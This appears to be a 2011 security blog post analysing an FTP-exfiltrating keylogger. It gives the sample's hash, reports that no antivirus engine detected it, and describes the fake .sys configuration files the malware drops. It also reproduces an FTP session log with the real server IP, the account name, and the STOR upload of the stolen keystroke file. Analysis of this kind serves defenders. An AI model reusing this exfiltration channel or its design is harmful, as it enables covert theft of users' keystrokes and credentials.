Thursday, May 5, 2011

FTP Keylogger

Rob @ myownangle has posted this FTP keylogger that is not detected by any anti-virus at this time. Did someone say Anti-Virus is effective 40% of the time. Its 0% effective against any new threats. Signture based detection is DEAD.

At the time of writing this malware, 2a61033a34be3dbbf0a3dfefdae4423c, has not been detected by any of the antivirus engines used by VirusTotal, 0 antimalware software out of 42 (0.0%) did not detected the threat.

Anyway, this is a malware (keylogger) that uses an FTP server to send out information regarding the infected machine.
It creates a directory in the FTP server (the directory is named as you PC name) and then stores information about the key pressed by the users.
The malware creates differents configuration files (.sys extension - but their are textual files and not drivers) in C:\WINDOWS\System32\drivers. These files has been used as configuration files by the malware to send out information.
It uses an FTP server to send out a file named: WinKey-[YOURCOMPUTER_NAME].html (in the directory system32).

220 ProFTPD 1.3.3d Server (ProFTPD) [69.175.121.66]
USER win32@video.x10.bz
331 Password required for win32@video.x10.bz
PASS [CONCEALED]
230 User win32@video.x10.bz logged in
....
CWD [COMPUTER_NAME]
250 CWD command successful
....
STOR WinKey-[COMPUTER_NAME].html
....

The file WinKey-[COMPUTER_NAME] contains the key pressed by the users:

......
==[notepad.exe]::[Untitled - Notepad]::[18:01:40]==
[MAIUSC]this ...... etc etc etc etc ..... TEXT TEXT TEXT .....